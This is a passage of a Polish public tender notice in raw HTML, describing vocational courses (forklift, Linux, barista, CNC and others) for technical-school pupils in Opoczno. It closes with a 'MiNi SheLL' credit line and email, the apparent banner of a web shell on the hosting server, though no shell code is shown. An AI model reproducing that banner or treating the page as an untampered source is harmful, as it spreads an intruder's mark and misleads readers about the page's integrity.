                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty faktury/rachunku</td><td>20</td></tr><tr><td>materiały szkoleniowe</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>KURS  WÓZKÓW JEZDNIOWYCH Z UPRAWNIENIAMI DO WYMIANY BUTLI Z GAZEM <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Zamawiający zleca a Wykonawca zobowiązuje się do przeprowadzenia dla uczniów/uczennic Technikum w Zespole Szkół Ponadgimnazjalnych w nr 1 w Opocznie zakwalifikowanych do projektu Rozwój kompetencji zawodowych uczniów Technikum kształcących się w zawodach: technik logistyk, technik analityk, technik elektryk, technik ekonomista, technik handlowiec, technik informatyk w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie we współpracy z przedsiębiorcami współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem, kursu wózków jezdniowych z uprawnieniami do wymiany butli z gazem, zgodnie z załącznikiem nr 1/9 do SIWZ zwanego dalej kursem.
2.	Wykonawca zobowiązany jest do przeprowadzenia zajęć w ramach kursu zgodnie z następującą tematyką: 
Teoria: Typy stosowanych wózków jezdniowych, budowa wózka jezdniowego, czynności kierowcy przy obsłudze wózków jezdniowych, czynności przed przejęciem pracy, w czasie i po pracy wózka jezdniowego, ładunkoznawstwo, zagadnienie dozoru technicznego, zasady budowy, działania i obsługi butli, instalacji gazowych , wymiana butli z gazem w wózku jezdniowym,  przepisy bhp i ppoż. 
Praktyka: praktyczna nauka jazdy wózkiem jezdniowym.
3.	Program kursu w zakresie obsługi wózków jezdniowych musi być zgodny z aktualnym ramowym programem nauczania zatwierdzonym przez Urząd Dozoru Technicznego nadzorowany przez Ministra właściwego do spraw gospodarki, z rozszerzeniem o szkolenie na wymianę butli gazowych.
4.	Wykonawca przeprowadzi kurs: 
	dla 14 uczniów/uczennic z kierunku kształcenia technik logistyk ( 2 grupy po 7 osób), w roku szkolnym 2016/2017)
	o łącznej liczbie godzin - 134 godziny dydaktyczne  (67 h na grupę - 52 godziny teoria, 15 godzin praktyka).Jednostka jedna godzina dydaktyczna, używana jest w rozumieniu 1 godziny lekcyjnej trwającej 45 minut.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie</td><td>20</td></tr><tr><td>termin zapłaty faktury/rachunku</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>ZAJĘCIA WARSZTATOWE Z ANALITYKI LABORATORYJNEJ  DLA UCZNIÓW/UCZENNIC KSZTAŁCĄCYCH SIĘ W ZAWODZIE TECHNIK ANALITYK<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usług edukacyjnych dla uczniów/uczennicTechnikum w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie zakwalifikowanych do projektu Rozwój kompetencji zawodowych uczniów Technikum kształcących się w zawodach: technik logistyk, technik analityk, technik elektryk, technik ekonomista, technik handlowiec, technik informatyk w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie we współpracy z przedsiębiorcami współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem, obejmujących zajęcia warsztatowe z analityki laboratoryjnej zgodnie z załącznikiem nr 1/10 do SIWZ zwane dalej warsztatami.
2. Wykonawca zobowiązany jest do przeprowadzenia zajęć zgodnie z następującą tematyką: 
Kolorymetria, analiza ilościowa, bliska podczerwień, analiza jakościowa, kalorymetria, wykorzystanie DSC.
3. Wykonawca przeprowadzi warsztaty:
	dla 11 uczniów/uczennic z kierunku kształcenia technik analityk (1 grupa  11 osób);
	o łącznej liczbie: 24 godzin dydaktycznych (4 spotkania po 6 godzin dydaktycznych). 
Jednostka jedna godzina dydaktyczna, używana jest w rozumieniu 1 godziny lekcyjnej trwającej 45 minut.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie</td><td>20</td></tr><tr><td>termin zapłaty faktury/rachunku</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>USŁUGA PRZEPROWADZENIA KURSÓW LINUX: 3115,3116,3117  SZKOLENIE ON-LINE<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usług edukacyjnych dla uczniów/uczennicTechnikum w Zespole Szkół Ponadgimnazjalnych nr 1 im. Stanisława Staszica w Opocznie zakwalifikowanych do projektu Rozwój kompetencji zawodowych uczniów Technikum kształcących się w zawodach: technik logistyk, technik analityk, technik elektryk, technik ekonomista, technik handlowiec, technik informatyk w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie we współpracy z przedsiębiorcami współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020, zwanego dalej projektem  obejmujących usługę realizacji kursów LINUX: 3115, 3116, 3117 obejmującą szkolenie e-learningowe zgodnie z załącznikiem nr 1/11 do SIWZ zwanych dalej kursem.
2.	Wykonawca zobowiązany jest do realizacji szkolenia e-learnigowego zgodnie z następującą tematyką: 
Tematyka zajęć kursu LINUX 3115 obejmuje w szczególności:
Podstawy systemów linuksowych w oparciu o rozwiązania SLE 11,środowisko Linux, zarządzanie systemem linuksowym, praca w konsoli tekstowej, administracja Linuksem, zarządzanie użytkownikami, grupami, ustawieniami, edytory, zarządzanie oprogramowaniem;
Tematyka zajęć kursu LINUX 3116 obejmuje w szczególności:
Administrowanie systemem linuksowym w oparciu o rozwiązania SLE 11, instalacja SUSE, uruchamianie systemu, administrowanie procesami, usługami, systemem plików, zdalna  administracja, monitorowanie, zabezpieczanie danych;
Tematyka zajęć kursu LINUX 3117 obejmuje w szczególności:
Administrowanie usługami serwerów linuksowych w oparciu o SLES 11, podstawowe usługi, zarządzanie wydrukiem, konfiguracja, testy diagnostyczne, wydajnościowe.
3.	Realizacja kursu obejmuje:
	Udział w kursie 10 uczniów/uczennic z kierunku kształcenia technik informatyk, (1 grupa), rok szkolny 2016/2017;
	łączną liczbę: 110 godzin dydaktycznych (w tym: Kurs Linux 3115 - 35 godz. dydaktycznych, Kurs Linux 3116  35 godz. dydaktycznych, Kurs Linux 3117  40 godz. dydaktycznych);
Jednostka jedna godzina dydaktyczna, używana jest w rozumieniu 1 godziny lekcyjnej trwającej 45 minut.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie</td><td>20</td></tr><tr><td>materiały dydaktyczne</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>12
                  
                <b>Nazwa: </b>KURS BARMANA<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usług edukacyjnych dla uczniów/uczennic Technikum w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie zakwalifikowanych do projektu Rozwój kompetencji zawodowych uczniów Technikum kształcących się w zawodach: technik obsługi turystycznej, technik mechanik, technik mechatronik, technik technologii żywności, technik hotelarstwa w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie we współpracy z przedsiębiorcami  współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem obejmujących kurs barmana zgodnie z załącznikiem nr 1/12 do SIWZ zwany dalej kursem.
2.	Wykonawca zobowiązany jest do przeprowadzenia zajęć zgodnie z następującą tematyką: 
Teoria: Techniki mieszania napojów zimnych, organizacja baru, przygotowywanie napojów klasycznych, prowadzenie lokalu, dobieranie i dostosowywanie produktów zgodnie z oczekiwaniem gościa, metody i akcesoria do przygotowywania napojów.
3.	Wykonawca przeprowadzi kurs:
	 dla 20 uczniów/uczennic z kierunku kształcenia technik obsługi turystycznej (2 grupy po 10 osób, w roku szkolnym 2016/2017); 
	o łącznej liczbie godzin - 80 godzin dydaktycznych, (40 godzin dydaktycznych na grupę).
Jednostka jedna godzina dydaktyczna, używana jest w rozumieniu 1 godziny lekcyjnej trwającej 45 minut.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie</td><td>20</td></tr><tr><td>termin zapłaty fakury/rachunu</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>13
                  
                <b>Nazwa: </b>KURS BARISTY<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usług edukacyjnych dla uczniów/uczennic Technikum w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie zakwalifikowanych do projektu Rozwój kompetencji zawodowych uczniów Technikum kształcących się w zawodach: technik obsługi turystycznej, technik mechanik, technik mechatronik, technik technologii żywności, technik hotelarstwa w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie we współpracy z przedsiębiorcami  współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem obejmujących kurs baristy zgodnie z  załącznikiem nr 1/13 do SIWZ zwany dalej kursem.
2.	Wykonawca zobowiązany jest do przeprowadzenia zajęć zgodnie z następującą tematyką: Teoria: Dobieranie, dostosowywanie produktów do potrzeb gości, rodzaje kawy i ich dobór, napoje kawowe, metody parzenia, informacje na temat kawy, gatunki kawy, uprawa kawy, obróbka ziaren kawy, przygotowywanie kawy według standardów obowiązujących w lokalach, obsługa urządzeń do parzenia kawy.
3.	Wykonawca przeprowadzi kurs:
	dla 20 uczniów/uczennic z kierunku technik obsługi turystycznej 
(2 grupy po 10 osób, w roku szkolnym 2016/2017), 
	o łącznej liczbie godzin - 60 godzin dydaktycznych (30 godzin dydaktycznych na grupę)
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie</td><td>20</td></tr><tr><td>termin zapłaty faktury/rachunku</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>14
                  
                <b>Nazwa: </b>KURS CARVINGU<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usług edukacyjnych dla uczniów/uczennic Technikum w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie zakwalifikowanych do projektu Rozwój kompetencji zawodowych uczniów Technikum kształcących się w zawodach: technik obsługi turystycznej, technik mechanik, technik mechatronik, technik technologii żywności, technik hotelarstwa w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie we współpracy z przedsiębiorcami  współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem obejmującego kurs Carvingu zgodnie z załącznikiem nr 1/14 do SIWZ zwany dalej kursem.
2.	Wykonawca zobowiązany jest do przeprowadzenia zajęć zgodnie z następującą tematyką: Teoria: Podstawowe cięcia, techniki rzeźbienia, możliwości wykorzystania owoców i warzyw sezonowych, sposoby przechowywania wyrzeźbionych owoców, rzeźb, rzeźby 3D;
3.	Wykonawca przeprowadzi kurs:
	dla 20 uczniów/uczennic z kierunku technik obsługi turystycznej 
(2 grupy po 10 osób, w roku szkolnym 2016/2017); 
	o łącznej liczbie godzin: 32 godzin dydaktycznych (16 godzin dydaktycznych na grupę).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie</td><td>20</td></tr><tr><td>termin zapłaty faktury/rachunku</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>15
                  
                <b>Nazwa: </b>WARSZTATY Z OBRABIAREK STEROWANYCH NUMERYCZNIE<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usług edukacyjnych dla uczniów/uczennic Technikum w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie zakwalifikowanych do projektu Rozwój kompetencji zawodowych uczniów Technikum kształcących się w zawodach: technik obsługi turystycznej, technik mechanik, technik mechatronik, technik technologii żywności, technik hotelarstwa w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie we współpracy z przedsiębiorcami współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem obejmujących Warsztaty z obrabiarek sterowanych numerycznie zgodnie z załącznikiem nr 1/15 do SIWZ zwane dalej warsztatami.
2.	Wykonawca zobowiązany jest do przeprowadzenia zajęć zgodnie z następującą tematyką: Procesy technologiczne, montaż, demontaż układów pneumatycznych, programowanie frezarek, układów elektrycznych, przekaźników. 
3.	Wykonawca przeprowadzi warsztaty:
	dla 26 uczniów/uczennic kształcących się w kierunku: technik mechanik i technik mechatronik (3 grupy po 8-10 osób w roku szkolnym 2016/2017), 
	o łącznej liczbie: 192 godzin dydaktycznych (64 godziny dydaktyczne każda grupa tj.8 spotkań po 8 godzin)

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie</td><td>20</td></tr><tr><td>termin zapłaty faktury/rachunku</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>16
                  
                <b>Nazwa: </b>WARSZTATY Z TECHNOLOGII ŻYWNOŚCI<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usług edukacyjnych dla uczniów/uczennic Technikum w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie zakwalifikowanych do projektu Rozwój kompetencji zawodowych uczniów Technikum kształcących się w zawodach: technik obsługi turystycznej, technik mechanik, technik mechatronik, technik technologii żywności, technik hotelarstwa w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie we współpracy z przedsiębiorcami współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem obejmujących Warsztaty z technologii żywności zgodnie z załącznikiem nr 1/16 do SIWZ zwane dalej warsztatami.
2.	Wykonawca zobowiązany jest do przeprowadzenia zajęć zgodnie z następującą tematyką: Technologia przetworów mięsnych, ocena technologiczna mięsa, analizy fizyko-chemiczne, przetwarzanie surowców owocowych, warzywnych, analiza fizyko-chemiczna owoców, warzyw, technologia przemysłu zbożowo-młynarskiego, metody badania jakości surowców, analizy fizyko-chemiczne produktów zbożowych, badanie jakości produktów mleczarskich, badanie jakości mikrobiologicznej produktów mleczarskich.
3.	Wykonawca przeprowadzi warsztaty: 
	dla 20 uczniów/uczennic z kierunku kształcenia technik technologii żywności, (2 grupy po 10 osób, w roku szkolnym 2016/2017); 
	o łącznej liczbie: 48 godzin dydaktycznych (24 godziny dydaktyczne każda grupa tj. 4 spotkania po 6 godzin).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie</td><td>20</td></tr><tr><td>termin zapłaty faktury/rachunku</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com